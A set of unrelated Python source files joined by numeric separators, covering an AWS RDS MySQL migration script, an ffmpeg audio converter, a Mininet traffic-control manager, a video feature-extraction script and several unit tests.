AvailabilityZone=args.availability_zone or source_instance['AvailabilityZone'],
BackupRetentionPeriod=0, # should be disabled for fast import, will be enabled after import
CopyTagsToSnapshot=source_instance['CopyTagsToSnapshot'],
DBInstanceClass=args.db_instance_class or source_instance['DBInstanceClass'],
DBInstanceIdentifier=args.new_instance_id,
DBParameterGroupName=new_parameter_group,
DBSubnetGroupName=source_instance['DBSubnetGroup']['DBSubnetGroupName'],
Engine=source_instance['Engine'],
EngineVersion=args.engine_version or source_instance['EngineVersion'],
LicenseModel=source_instance['LicenseModel'],
MasterUserPassword=args.master_user_password,
MasterUsername=args.master_user_name,
OptionGroupName=args.option_group or source_instance['OptionGroupMemberships'][0]['OptionGroupName'],
MultiAZ=False, # should be disabled for fast import, will be enabled after import
Port=source_instance['Endpoint']['Port'],
PreferredBackupWindow=source_instance['PreferredBackupWindow'],
PreferredMaintenanceWindow=source_instance['PreferredMaintenanceWindow'],
PubliclyAccessible=source_instance['PubliclyAccessible'],
StorageEncrypted=source_instance['StorageEncrypted'],
StorageType=source_instance['StorageType'],
VpcSecurityGroupIds=security_group_ids, )
if source_instance.get('Iops', 0) > 0:
new_instance_params['Iops'] = args.iops or source_instance['Iops']
if source_instance.get('MonitoringInterval', 0) > 0:
new_instance_params['MonitoringInterval'] = source_instance['MonitoringInterval']
new_instance_params['MonitoringRoleArn'] = source_instance['MonitoringRoleArn']
rds.create_db_instance(**new_instance_params)
read_replica_instance_id = "%s-readreplica-%s" % (source_instance['DBInstanceIdentifier'], timestamp)
logger.info("crating read replica: %s", read_replica_instance_id)
rds.create_db_instance_read_replica(
DBInstanceIdentifier=read_replica_instance_id,
SourceDBInstanceIdentifier=source_instance['DBInstanceIdentifier'],
DBInstanceClass=source_instance['DBInstanceClass'],
AvailabilityZone=source_instance['AvailabilityZone'])['DBInstance']
logger.info("waiting for new instance to become available")
wait_db_instance_available(args.new_instance_id)
logger.info("getting details of new instance")
new_instance = rds.describe_db_instances(DBInstanceIdentifier=args.new_instance_id)['DBInstances'][0]
logger.info("waiting for read replica to become available")
wait_db_instance_available(read_replica_instance_id)
logger.info("getting details of created read replica")
read_replica_instance = rds.describe_db_instances(DBInstanceIdentifier=read_replica_instance_id)['DBInstances'][0]
logger.info("stopping replication on read replica")
with connect_db(read_replica_instance, cursorclass=pymysql.cursors.DictCursor) as cursor:
cursor.callproc("mysql.rds_stop_replication")
logger.info("finding binlog position")
cursor.execute("SHOW SLAVE STATUS")
slave_status = cursor.fetchone()
binlog_filename, binlog_position = slave_status['Relay_Master_Log_File'], slave_status['Exec_Master_Log_Pos']
logger.info("master status: filename: %s position: %s", binlog_filename, binlog_position)
logger.info("dumping data from read replica")
dump_args = [
'mysqldump',
'-h',
read_replica_instance['Endpoint']['Address'],
'-P',
str(read_replica_instance['Endpoint']['Port']),
'-u',
args.master_user_name,
'--single-transaction',
'--order-by-primary',
'--set-gtid-purged=OFF',
'--databases',
]
logger.debug("running mysqldump: %s", " ".join(dump_args))
dump_args.extend(args.databases.split(','))
dump = subprocess.Popen(dump_args, stdout=subprocess.PIPE)
logger.info("loading data to new instance")
load_args = [
'mysql',
'-h',
new_instance['Endpoint']['Address'],
'-P',
str(new_instance['Endpoint']['Port']),
'-u',
args.master_user_name,
'-f',
]
logger.debug("running mysql for loding data: %s", " ".join(load_args))
load = subprocess.Popen(load_args, stdin=dump.stdout)
logger.info("waiting for data transfer to finish")
load.wait()
assert load.returncode == 0
dump.wait()
assert dump.returncode == 0
logger.info("data transfer is finished")
logger.info("deleting read replica instance")
rds.delete_db_instance(DBInstanceIdentifier=read_replica_instance_id, SkipFinalSnapshot=True)
logger.info("setting master on new instance")
with connect_db(new_instance) as cursor:
cursor.callproc("mysql.rds_set_external_master",
(source_instance['Endpoint']['Address'], source_instance['Endpoint']['Port'],
args.master_user_name, args.master_user_password, binlog_filename, binlog_position, 0))
logger.info("starting replication on new instance")
with connect_db(new_instance) as cursor:
cursor.callproc("mysql.rds_start_replication")
if grants:
logger.info("creating users on new instance")
with connect_db(new_instance) as cursor:
for grant in grants:
logger.debug("executing grant sql: %s", grant)
cursor.execute(grant)
logger.info("wating until new instance catches source instance")
wait_until_zero_lag(new_instance)
changes = {}
if source_instance['BackupRetentionPeriod'] > 0:
changes['BackupRetentionPeriod'] = source_instance['BackupRetentionPeriod']
changes['PreferredBackupWindow'] = source_instance['PreferredBackupWindow']
if source_instance['MultiAZ']:
changes['MultiAZ'] = source_instance['MultiAZ']
if source_instance['PerformanceInsightsEnabled']:
changes['EnablePerformanceInsights'] = source_instance['PerformanceInsightsEnabled']
changes['PerformanceInsightsKMSKeyId'] = source_instance['PerformanceInsightsKMSKeyId']
changes['PerformanceInsightsRetentionPeriod'] = source_instance['PerformanceInsightsRetentionPeriod']
if changes:
logger.info("modifying new instance last time")
rds.modify_db_instance(DBInstanceIdentifier=args.new_instance_id, ApplyImmediately=True, **changes)
logger.info("waiting for new instance to become available")
time.sleep(60) # instance state does not switch to "modifying" immediately
wait_db_instance_available(args.new_instance_id)
logger.info("wating until new instance catches source instance")
wait_until_zero_lag(new_instance)
logger.info("all done")
if __name__ == '__main__':
main()
|
56543
|
import os
import subprocess
from audio_length import escape_characters
import argparse
filetypes_to_convert=[".mp3",".m4a", ".webm"]
def convert(filename):
filename_extensionless, extension = os.path.splitext(filename)
new_filename = "".join([filename_extensionless, ".wav"])
if not os.path.exists(new_filename):
command = "ffmpeg -i \"{}\" -ac 1 \"{}\"".format(escape_characters(filename), escape_characters(new_filename))
subprocess.call(command, shell=True)
def walk_path(path):
for root, dirs, files in os.walk(path):
for sound_file in files:
_, extension = os.path.splitext(sound_file)
#print sound_file
if extension in filetypes_to_convert:
yield os.path.join(root, sound_file)
else:
continue
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--path', dest='path', help='Directory for the files to convert', required=True)
args = parser.parse_args()
for sound_file in walk_path(args.path):
convert(sound_file)
|
56597
|
from stream import CStream
from tokenizer import L2
from data import Expr, Literal, Position
#import space
#table = {
# u'(': u'lp', u')': u'rp',
# u'[': u'lb', u']': u'rb',
# u'{': u'lc', u'}': u'rc',
# u'and': u'and', u'or': u'or', u'not': u'not',
# u'=': u'let', u':=': u'set',
# u'<': u'chain',
# u'>': u'chain',
# u'<=': u'chain',
# u'>=': u'chain',
# u'==': u'chain',
# u'!=': u'chain',
# u'^': u'op', u'&': u'op', u'<<': u'op',
# u'>>': u'op', u'!': u'op', u'*': u'op',
# u'/': u'op', u'%': u'op', u'+': u'op',
# u'-': u'op', u'|': u'op', u'++': u'op',
# u':': u'symbol',
# u'.': u'dot'}
#binops = {
# u'|': 10,
# u'^': 10,
# u'&': 20,
# u'<<': 30, u'>>': 40,
# u'++': 40, u'+': 40, u'-': 40,
# u'*': 50, u'/': 50, u'%': 50,
#}
#right_binding = []
#prefixes = {
# u'~': 90,
# u'-': 90,
# u'+': 90,
#}
#postfixes = {
# u'!': 100,
#}
#
#def read(source):
# exps = []
# ts = L2(CStream(source), table)
# while ts.filled:
# if ts.position.col != 0:
# raise space.Error(u"%s: layout error" % ts.first.start.repr())
# exps.append(toplevel(ts, 0))
# return exps
#
#def toplevel(ts, col):
# head = expression(ts)
# if head.dcf is not None and ts.filled:
# if head.stop.lno == ts.position.lno:
# head.dcf.capture = [toplevel(ts, col)]
# elif ts.position.col > col:
# head.dcf.capture = exps = []
# scol = ts.position.col
# while ts.filled and ts.position.col == scol:
# exp = toplevel(ts, scol)
# exps.append(exp)
# while ts.filled and ts.position.lno == exp.stop.lno and ts.position.col > scol:
# exps.append(toplevel(ts, scol))
# return head
#
#def expressions(ts):
# exps = []
# while ts.filled:
# if match_some(ts.first, [u'rp', u'rb', u'rc']):
# break
# exps.append(expression(ts))
# return exps
#
#def expression(ts):
# left = expression_and(ts)
# if match(ts.first, u'or'):
# op = ts.advance()
# op.name = u'symbol'
# right = expression(ts)
# return Expr(left.start, right.stop, u'form', [op, left, right])
# return left
#
#def expression_and(ts):
# left = expression_chain(ts)
# if match(ts.first, u'and'):
# op = ts.advance()
# op.name = u'symbol'
# right = expression_and(ts)
# return Expr(left.start, right.stop, u'form', [op, left, right])
# return left
#
#def expression_chain(ts):
# left = expression_bare(ts, 0)
# if match(ts.first, u'chain'):
# exps = [left]
# while match(ts.first, u'chain'):
# op = ts.advance()
# op.name = u'symbol'
# exps.append(op)
# exps.append(expression_bare(ts, 0))
# left = Expr(exps[0].start, exps[len(exps)-1].stop, u'chain', exps)
# return left
#
#def expression_bare(ts, rbp):
# if on_prefix(ts):
# op = ts.advance()
# exp = expression_bare(ts, prefixes[op.value])
# op.name = u'symbol'
# op.value = op.value+u'expr'
# left = Expr(op.start, exp.stop, u'form', [op, exp])
# else:
# left = terminal(ts)
# while ts.filled:
# if match(ts.first, u'dot'):
# dot = ts.advance()
# symbol = ts.advance()
# if not match(symbol, u'symbol'):
# raise space.Error(u"%s: expected symbol" % symbol.start.repr())
# left = Expr(left.start, symbol.stop, u'attr', [left, symbol])
# elif match(ts.first, u'lb') and left.stop.eq(ts.first.start):
# lb = ts.advance()
# exps = expressions(ts)
# if not match(ts.first, u'rb'):
# raise space.Error(u"%s: [] truncates at %s" % (lb.start.repr(), ts.position.repr()))
# rb = ts.advance()
# left = Expr(left.start, rb.stop, u'index', [left] + exps)
# elif match_some(ts.first, [u'let', u'set']):
# let = ts.advance()
# exp = expression(ts)
# left = Expr(left.start, exp.stop, let.name, [left, exp])
# elif match(ts.first, u'op') and match(ts.second, u'let') and ts.first.value in binops:
# aug = ts.advance()
# aug.name = u'symbol'
# let = ts.advance()
# exp = expression(ts)
# left = Expr(left.start, exp.stop, u'aug', [aug, left, exp])
# else:
# break
# while ts.filled:
# if on_binop(left, ts) and rbp < binops.get(ts.first.value, 0):
# op = ts.advance()
# op.name = u'symbol'
# lbp = binops.get(op.value, 0)
# right = expression_bare(ts, lbp - (ts.first.value in right_binding))
# left = Expr(left.start, right.stop, u'form', [op, left, right])
# elif on_postfix(left, ts) and rbp < postfixes.get(ts.first.value, 0):
# op = ts.advance()
# op.name = u'symbol'
# lbp = postfixes.get(op.value, 0)
# op.value = u'expr'+op.value
# left = Expr(left.start, op.stop, u'form', [op, left])
# else:
# break
# return left
#
#def terminal(ts):
# if match_some(ts.first, [u'symbol', u'string', u'int', u'hex', u'float']):
# return ts.advance()
# elif match(ts.first, u'lp'):
# lp = ts.advance()
# exps = expressions(ts)
# if not match(ts.first, u'rp'):
# raise space.Error(u"%s: form truncates at %s" % (lp.start.repr(), ts.position.repr()))
# rp = ts.advance()
# exp = Expr(lp.start, rp.stop, u'form', exps)
# exp.dcf = exp
# return exp
# elif match(ts.first, u'lb'):
# lb = ts.advance()
# exps = expressions(ts)
# if not match(ts.first, u'rb'):
# raise space.Error(u"%s: list truncates at %s" % (lb.start.repr(), ts.position.repr()))
# rb = ts.advance()
# exp = Expr(lb.start, rb.stop, u'list', exps)
# exp.dcf = exp
# return exp
# elif match(ts.first, u'lc'):
# lc = ts.advance()
# if match(ts.second, u'rc'):
# exp = ts.advance()
# exp.name = u'symbol'
# else:
# exp = expression(ts)
# rc = ts.advance()
# return exp
# elif match(ts.first, u'not'):
# op = ts.advance()
# op.name = u'symbol'
# exp = expression_chain(ts)
# return Expr(op.start, exp.stop, u'form', [op, exp])
# if ts.filled:
# raise space.Error(u"%s: expected term, got %s" % (ts.position.repr(), ts.first.value))
# raise space.Error(u"%s: expected term, got eof" % ts.position.repr())
#
#def match_some(t, names):
# return t is not None and t.name in names
#
#def match(t, name):
# return t is not None and t.name == name
#
#def on_prefix(ts):
# if match(ts.first, u'op') and ts.second is not None:
# return ts.first.stop.eq(ts.second.start)
# return False
#
#def on_binop(left, ts):
# if match(ts.first, u'op') and ts.second is not None:
# l = left.stop.eq(ts.first.start)
# r = ts.first.stop.eq(ts.second.start)
# return l == r
# return False
#
#def on_postfix(left, ts):
# if match(ts.first, u'op'):
# l = left.stop.eq(ts.first.start)
# r = ts.second is not None and ts.first.stop.eq(ts.second.start)
# return l and not r
# return False
|
56647
|
import os
import sys
from mininet.node import RemoteController
from mininet.net import Mininet
import dc_gym.utils as dc_utils
import logging
log = logging.getLogger(__name__)
cwd = os.getcwd()
FILE_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, FILE_DIR)
def get_congestion_control():
prev_cc = os.popen("sysctl -n net.ipv4.tcp_congestion_control").read()
return prev_cc
def load_congestion_control(tcp_policy):
if tcp_policy == "dctcp":
dc_utils.exec_process("modprobe tcp_dctcp")
dc_utils.exec_process("sysctl -w net.ipv4.tcp_ecn=1")
elif tcp_policy == "tcp_nv":
dc_utils.exec_process("modprobe tcp_nv")
elif tcp_policy == "pcc":
if (os.popen("lsmod | grep pcc").read() == ""):
dc_utils.exec_process("insmod %s/tcp_pcc.ko" % FILE_DIR)
def calc_ecn(max_throughput, avg_pkt_size):
# Calculate the marking threshold as part of the BDP
bdp = max_throughput * 100 * 1e-6
marking_threshold = bdp * 0.17
# if the marking_threshold is smaller than the packet size set the
# threshold to around two packets
if (marking_threshold < avg_pkt_size):
marking_threshold = avg_pkt_size * 2
# also limit the marking threshold to 50KB
elif marking_threshold > 50e3:
marking_threshold = 50e3
return marking_threshold
class NetworkManager():
def __init__(self, topo, tcp_policy="tcp"):
self.topo = topo
self.net = None
self.net_stopped = False
self.host_ctrl_map = {}
self.tcp_policy = tcp_policy
self.prev_cc = get_congestion_control()
load_congestion_control(tcp_policy)
self.start_network()
def _apply_qdisc(self, port):
""" Here be dragons... """
# tc_cmd = "tc qdisc add dev %s " % (port)
# cmd = "root handle 1: hfsc default 10"
# log.info(tc_cmd + cmd)
# dc_utils.exec_process(tc_cmd + cmd)
# tc_cmd = "tc class add dev %s " % (port)
# cmd = "parent 1: classid 1:10 hfsc sc rate %dbit ul rate %dbit" % (
# self.topo.max_bps, self.topo.max_bps)
# log.info(tc_cmd + cmd)
# dc_utils.exec_process(tc_cmd + cmd)
limit = int(self.topo.max_queue)
avg_pkt_size = 1500 # MTU packet size
tc_cmd = "tc qdisc add dev %s " % (port)
cmd = "root handle 1: htb default 10 "
# cmd = "root handle 1: estimator 250msec 1sec htb default 10 "
cmd += " direct_qlen %d " % (limit / avg_pkt_size)
log.debug(tc_cmd + cmd)
dc_utils.exec_process(tc_cmd + cmd)
tc_cmd = "tc class add dev %s " % (port)
cmd = "parent 1: classid 1:10 htb rate %dbit burst %d" % (
self.topo.max_bps, self.topo.max_bps)
log.debug(tc_cmd + cmd)
dc_utils.exec_process(tc_cmd + cmd)
if self.tcp_policy == "dctcp":
marking_threshold = calc_ecn(self.topo.max_bps, avg_pkt_size)
# Apply aggressive RED to mark excess packets in the queue
max_q = limit / 4
min_q = int(marking_threshold)
tc_cmd = "tc qdisc add dev %s " % (port)
cmd = "parent 1:10 handle 20:1 red "
cmd += "limit %d " % (limit)
cmd += "bandwidth %dbit " % self.topo.max_bps
cmd += "avpkt %d " % avg_pkt_size
cmd += "min %d " % min_q
cmd += "max %d " % max_q
# Ballpark burst hard limit...
burst = (min_q + min_q + max_q) / (3 * avg_pkt_size)
cmd += "burst %d " % burst
cmd += "probability 0.1"
cmd += " ecn "
log.debug(tc_cmd + cmd)
dc_utils.exec_process(tc_cmd + cmd)
else:
tc_cmd = "tc qdisc add dev %s " % (port)
cmd = "parent 1:10 handle 20:1 bfifo "
cmd += " limit %d" % limit
dc_utils.exec_process(tc_cmd + cmd)
# tc_cmd = "tc qdisc add dev %s " % (port)
# cmd = "root handle 1 netem limit %d rate 10mbit" % (
# limit / avg_pkt_size)
# log.info(tc_cmd + cmd)
# dc_utils.exec_process(tc_cmd + cmd)
# limit = int(self.topo.max_queue)
# tc_cmd = "tc qdisc add dev %s " % (port)
# cmd = "parent 1:10 handle 20: codel "
# cmd += " limit %d" % (limit)
# dc_utils.exec_process(tc_cmd + cmd)
# limit = int(self.topo.max_queue)
# max_q = self.topo.max_queue / 4
# min_q = max_q / 3
# tc_cmd = "tc qdisc add dev %s " % (port)
# cmd = "parent 1:10 handle 20:1 sfq limit %d" % (
# self.topo.max_queue)
# if self.dctcp:
# dc_utils.exec_process("sysctl -w net.ipv4.tcp_ecn=1")
# cmd += "ecn "
# # cmd += "redflowlimit "
# # cmd += "min %d " % (min_q)
# # cmd += "max %d " % (max_q)
# # cmd += "probability 1"
# log.info(tc_cmd + cmd)
# dc_utils.exec_process(tc_cmd + cmd)
# Apply tc choke to mark excess packets in the queue with ecn
# limit = int(self.topo.max_queue)
# max_q = self.topo.max_queue
# min_q = 400
# tc_cmd = "tc qdisc add dev %s " % (port)
# cmd = "parent 1:10 handle 10:1 choke limit %d " % limit
# cmd += "bandwidth %dbit " % self.topo.max_bps
# cmd += "min %d " % (min_q)
# cmd += "max %d " % (max_q)
# cmd += "probability 0.001"
# # if self.dctcp:
# cmd += " ecn "
# log.info(tc_cmd + cmd)
# dc_utils.exec_process(tc_cmd + cmd)
# tc_cmd = "tc qdisc add dev %s " % (port)
# cmd = "parent 1:10 handle 30:1 fq_codel limit %d " % (
# self.topo.max_queue)
# if ("dctcp" in self.conf) and self.conf["dctcp"]:
# dc_utils.exec_process("sysctl -w net.ipv4.tcp_ecn=1")
# cmd += "ecn "
# log.info(tc_cmd + cmd)
# dc_utils.exec_process(tc_cmd + cmd)
dc_utils.exec_process("ip link set %s txqueuelen %d" %
(port, limit / avg_pkt_size))
dc_utils.exec_process("ip link set %s mtu 1500" % port)
def _connect_controller(self, net):
controller = RemoteController(self.topo.switch_id + "_c")
net.addController(controller)
for i, host in enumerate(self.topo.host_list):
# Configure host
net.addLink(controller, host)
# Configure controller
ctrl_iface = "%s_c-eth%d" % (self.topo.switch_id, i)
for index, switch in self.topo.ports[host].items():
switch_iface = switch[0] + "-eth" + str(switch[1])
self.host_ctrl_map[switch_iface] = ctrl_iface
def _config_links(self, net):
for switch in net.switches:
for port in switch.intfList():
if port.name != "lo":
self._apply_qdisc(port)
def _config_hosts(self, net):
for host in net.hosts:
# Increase the maximum total buffer-space allocatable
# This is measured in units of pages (4096 bytes)
dc_utils.exec_process(
"sysctl -w net.ipv4.tcp_window_scaling=1", host)
dc_utils.exec_process(
"sysctl -w net.ipv4.tcp_timestamps=1", host)
dc_utils.exec_process("sysctl -w net.ipv4.tcp_sack=1", host)
dc_utils.exec_process(
"sysctl -w net.ipv4.tcp_syn_retries=10", host)
# dc_utils.exec_process(
# "sysctl -w net.core.default_qdisc=pfifo_fast", host)
# dc_utils.exec_process("sysctl -w net.ipv4.tcp_recovery=0")
if self.tcp_policy == "dctcp":
dc_utils.exec_process(
"sysctl -w net.ipv4.tcp_congestion_control=dctcp", host)
dc_utils.exec_process("sysctl -w net.ipv4.tcp_ecn=1", host)
dc_utils.exec_process(
"sysctl -w net.ipv4.tcp_ecn_fallback=0", host)
elif self.tcp_policy == "tcp_nv":
dc_utils.exec_process(
"sysctl -w net.ipv4.tcp_congestion_control=nv", host)
elif self.tcp_policy == "pcc":
dc_utils.exec_process(
"sysctl -w net.ipv4.tcp_congestion_control=pcc", host)
def _config_network(self, net):
self.topo._config_topo()
self._config_links(net)
self._config_hosts(net)
self._connect_controller(net)
# log.info("Testing reachability after configuration...\n")
# net.ping()
# log.info("Testing bandwidth after configuration...\n")
# net.iperf()
def get_net(self):
return self.net
def get_topo(self):
return self.topo
def get_sw_ports(self):
switches = self.net.switches
sw_intfs = []
for switch in switches:
for intf in switch.intfNames():
if intf is not "lo":
sw_intfs.append(intf)
return sw_intfs
def get_host_ports(self):
return self.host_ctrl_map.keys()
def get_num_sw_ports(self):
return self.topo.get_num_sw_ports()
def get_num_hosts(self):
return self.topo.get_num_hosts()
def start_network(self):
# Start Mininet
self.net = Mininet(topo=self.topo, controller=None, autoSetMacs=True)
self.net.start()
self._config_network(self.net)
self.net_stopped = False
def stop_network(self):
if not self.net_stopped:
self.net_stopped = True
log.info("Removing interfaces and restoring all network state.")
if self.tcp_policy == "dctcp":
dc_utils.exec_process("sysctl -w net.ipv4.tcp_ecn=0")
# reset the active host congestion control to the previous value
cmd = "sysctl -w net.ipv4.tcp_congestion_control=%s" % self.prev_cc
dc_utils.exec_process(cmd)
log.info("Deleting the virtual network")
self.net.stop()
log.info("Successfully deleted the virtual network")
|
56673
|
import unittest
from descriptastorus import MolFileIndex
import os, shutil
import logging
import datahook
TEST_DIR = "test1"
class TestCase(unittest.TestCase):
def setUp(self):
if os.path.exists(TEST_DIR):
shutil.rmtree(TEST_DIR, ignore_errors=True)
index = self.index = MolFileIndex.MakeSmilesIndex(
os.path.join(datahook.datadir, "../data/test1.smi"), TEST_DIR, hasHeader=True,
smilesColumn="smiles", nameColumn="name")
def tearDown(self):
if os.path.exists(TEST_DIR):
shutil.rmtree(TEST_DIR, ignore_errors=True)
def testIndexing(self):
logging.info("Running index test")
self.assertEqual(self.index.N, 14)
self.assertEqual(self.index.getMol(12), 'c1ccccc1CCCCCCCCCCCC')
self.assertEqual(self.index.getName(12), '13')
self.assertEqual(self.index.getRDMol(13), None)
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
unittest.main()
|
56702
|
import os
import sys
import argparse
import time
parser = argparse.ArgumentParser()
parser.add_argument('-gpu', default='0', type=str)
args = parser.parse_args()
os.environ["CUDA_VISIBLE_DEVICES"]=args.gpu
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.optim import lr_scheduler
from torch.autograd import Variable
import torchvision
from torchvision import datasets, transforms
#import videotransforms
from torchsummary import summary
import numpy as np
import pkbar
from apmeter import APMeter
import x3d_fine
from charades_fine import Charades
from charades_fine import mt_collate_fn as collate_fn
from transforms.spatial_transforms import Compose, Normalize, RandomHorizontalFlip, MultiScaleRandomCrop, MultiScaleRandomCropMultigrid, ToTensor, CenterCrop, CenterCropScaled
from transforms.temporal_transforms import TemporalRandomCrop
from transforms.target_transforms import ClassLabel
import warnings
warnings.filterwarnings("ignore")
BS = 1
BS_UPSCALE = 1
INIT_LR = 0.02 * BS_UPSCALE
X3D_VERSION = 'M'
CHARADES_MEAN = [0.413, 0.368, 0.338]
CHARADES_STD = [0.131, 0.125, 0.132]
CHARADES_TR_SIZE = 7900
CHARADES_VAL_SIZE = 1850
CHARADES_ROOT = '/data/add_disk0/kumarak/Charades_v1_rgb'
CHARADES_ANNO = 'data/charades.json'
FINE_SAVE_DIR = '/nfs/bigcornea/add_disk0/kumarak/fine_spatial7x7'
# pre-extract fine features and save here, to reduce compute req
# MAKE DIRS FINE_SAVE_DIR/['layer1', 'layer2', 'layer3', 'layer4', 'conv5']
feat_keys = ['layer1', 'layer2', 'layer3', 'layer4', 'conv5']
for k in feat_keys:
if not os.path.exists(os.path.join(FINE_SAVE_DIR,k)):
os.makedirs(os.path.join(FINE_SAVE_DIR,k))
# 0.00125 * BS_UPSCALE --> 80 epochs warmup 2000
def run(init_lr=INIT_LR, warmup_steps=0, max_epochs=100, root=CHARADES_ROOT,
train_split=CHARADES_ANNO, batch_size=BS*BS_UPSCALE, frames=80, save_dir= FINE_SAVE_DIR):
crop_size = {'S':160, 'M':224, 'XL':312}[X3D_VERSION]
resize_size = {'S':[180.,225.], 'M':[256.,256.], 'XL':[360.,450.]}[X3D_VERSION] #[256.,320.]
gamma_tau = {'S':6, 'M':5*1, 'XL':5}[X3D_VERSION] # 5
load_steps = st_steps = steps = 0
epochs = 0
num_steps_per_update = 1
cur_iterations = steps * num_steps_per_update
iterations_per_epoch = CHARADES_TR_SIZE//(batch_size*1)
val_iterations_per_epoch = CHARADES_VAL_SIZE//(batch_size)
max_steps = iterations_per_epoch * max_epochs
val_spatial_transforms = Compose([CenterCropScaled(crop_size),
ToTensor(255),
Normalize(CHARADES_MEAN, CHARADES_STD)])
# SET 'TESTING' FOR BOTH, TO EXTRACT
dataset = Charades(train_split, 'testing', root, val_spatial_transforms,
task='loc', frames=frames, gamma_tau=gamma_tau, crops=1, extract_feat=True)
dataloader = torch.utils.data.DataLoader(dataset, batch_size=batch_size, shuffle=True,
num_workers=8, pin_memory=True, collate_fn=collate_fn)
val_dataset = Charades(train_split, 'testing', root, val_spatial_transforms,
task='loc', frames=frames, gamma_tau=gamma_tau, crops=1, extract_feat=True)
val_dataloader = torch.utils.data.DataLoader(val_dataset, batch_size=batch_size, shuffle=False,
num_workers=8, pin_memory=True, collate_fn=collate_fn)
dataloaders = {'train': dataloader, 'val': val_dataloader}
datasets = {'train': dataset, 'val': val_dataset}
print('train',len(datasets['train']),'val',len(datasets['val']))
print('Total iterations:', max_steps, 'Total epochs:', max_epochs)
print('datasets created')
fine_net = x3d_fine.generate_model(x3d_version=X3D_VERSION, n_classes=400, n_input_channels=3, task='loc',
dropout=0.5, base_bn_splits=1, global_tower=True)
fine_net.replace_logits(157)
load_ckpt = torch.load('models/fine_charades_039000_SAVE.pt')
state = fine_net.state_dict()
state.update(load_ckpt['model_state_dict'])
fine_net.load_state_dict(state)
fine_net.cuda()
fine_net = nn.DataParallel(fine_net)
print('model loaded')
lr = init_lr
print ('LR:%f'%lr)
optimizer = optim.SGD(fine_net.parameters(), lr=lr, momentum=0.9, weight_decay=1e-5)
lr_sched = optim.lr_scheduler.ReduceLROnPlateau(optimizer, mode='min', patience=3, factor=0.1, verbose=True)
if steps>0:
optimizer.load_state_dict(load_ckpt['optimizer_state_dict'])
lr_sched.load_state_dict(load_ckpt['scheduler_state_dict'])
criterion = nn.BCEWithLogitsLoss()
val_apm = APMeter()
tr_apm = APMeter()
while epochs < max_epochs:
print ('Step {} Epoch {}'.format(steps, epochs))
print ('-' * 10)
# Each epoch has a training and validation phase
for phase in ['train']+['val']:
bar_st = iterations_per_epoch if phase == 'train' else val_iterations_per_epoch
bar = pkbar.Pbar(name='update: ', target=bar_st)
fine_net.train(False) # Set model to evaluate mode
# FOR EVAL AGGREGATE BN STATS
_ = fine_net.module.aggregate_sub_bn_stats()
torch.autograd.set_grad_enabled(False)
tot_loss = 0.0
tot_loc_loss = 0.0
tot_cls_loss = 0.0
tot_dis_loss = 0.0
tot_acc = 0.0
tot_corr = 0.0
tot_dat = 0.0
num_iter = 0
optimizer.zero_grad()
# Iterate over data.
print(phase)
for i,data in enumerate(dataloaders[phase]):
#for data in dataloaders[phase]:
num_iter += 1
bar.update(i)
inputs, labels, masks, name = data
b,n,c,t,h,w = inputs.shape
inputs = inputs.view(b*n,c,t,h,w)
inputs = inputs.cuda() # B 3 T W H
tl = labels.size(2)
labels = labels.cuda() # B C TL
masks = masks.cuda() # B TL
valid_t = torch.sum(masks, dim=1).int()
feat,_ = fine_net([inputs, masks]) # N C T 1 1
keys = list(feat.keys())
print(i, name[0], feat[keys[0]].cpu().numpy().shape, feat[keys[1]].cpu().numpy().shape,
feat[keys[2]].cpu().numpy().shape, feat[keys[3]].cpu().numpy().shape, feat[keys[4]].cpu().numpy().shape)
for k in feat:
torch.save(feat[k].data.cpu(), os.path.join(save_dir, k, name[0]))
break
if __name__ == '__main__':
run()
|
56708
|
def entry_id(entry):
for field in ['id', 'link']:
ret = getattr(entry, field, None)
if ret:
return ret
raise Exception('no id field found in entry: {}'.format(entry))
|
56710
|
import os
from py.path import local
import pypy
from pypy.tool.udir import udir
from pypy.translator.c.test.test_genc import compile
from pypy.rpython import extregistry
import errno
import sys
import py
def getllimpl(fn):
return extregistry.lookup(fn).lltypeimpl
def test_access():
filename = str(udir.join('test_access.txt'))
fd = file(filename, 'w')
fd.close()
for mode in os.R_OK, os.W_OK, os.X_OK, os.R_OK | os.W_OK | os.X_OK:
result = getllimpl(os.access)(filename, mode)
assert result == os.access(filename, mode)
def test_times():
"""
posix.times should compile as an RPython function and should return a
five-tuple giving float-representations (seconds, effectively) of the four
fields from the underlying struct tms and the return value.
"""
times = compile(lambda: os.times(), ())()
assert isinstance(times, tuple)
assert len(times) == 5
for value in times:
assert isinstance(value, float)
def test__getfullpathname():
if os.name != 'nt':
py.test.skip('nt specific function')
posix = __import__(os.name)
sysdrv = os.getenv('SystemDrive', 'C:')
stuff = sysdrv + 'stuff'
data = getllimpl(posix._getfullpathname)(stuff)
assert data == posix._getfullpathname(stuff)
# the most intriguing failure of ntpath.py should not repeat, here:
assert not data.endswith(stuff)
def test_getcwd():
data = getllimpl(os.getcwd)()
assert data == os.getcwd()
def test_strerror():
data = getllimpl(os.strerror)(2)
assert data == os.strerror(2)
def test_system():
filename = str(udir.join('test_system.txt'))
arg = 'python -c "print 1+1" > %s' % filename
data = getllimpl(os.system)(arg)
assert data == 0
assert file(filename).read().strip() == '2'
os.unlink(filename)
EXECVE_ENV = {"foo": "bar", "baz": "quux"}
execve_tests = str(local(__file__).dirpath().join('execve_tests.py'))
def test_execve():
if os.name != 'posix':
py.test.skip('posix specific function')
base = " ".join([
sys.executable,
execve_tests,
str(local(pypy.__file__).join('..', '..')),
''])
# Test exit status and code
result = os.system(base + "execve_true")
assert os.WIFEXITED(result)
assert os.WEXITSTATUS(result) == 0
result = os.system(base + "execve_false")
assert os.WIFEXITED(result)
assert os.WEXITSTATUS(result) == 1
# Test environment
result = os.popen(base + "execve_env").read()
assert dict([line.split('=') for line in result.splitlines()]) == EXECVE_ENV
# These won't actually execute anything, so they don't need a child process
# helper.
execve = getllimpl(os.execve)
# If the target does not exist, an OSError should result
info = py.test.raises(
OSError, execve, execve_tests + "-non-existent", [], {})
assert info.value.errno == errno.ENOENT
# If the target is not executable, an OSError should result
info = py.test.raises(
OSError, execve, execve_tests, [], {})
assert info.value.errno == errno.EACCES
class ExpectTestOs:
def setup_class(cls):
if not hasattr(os, 'ttyname'):
py.test.skip("no ttyname")
def test_ttyname(self):
import os
import py
from pypy.rpython.test.test_llinterp import interpret
def ll_to_string(s):
return ''.join(s.chars)
def f(num):
try:
return os.ttyname(num)
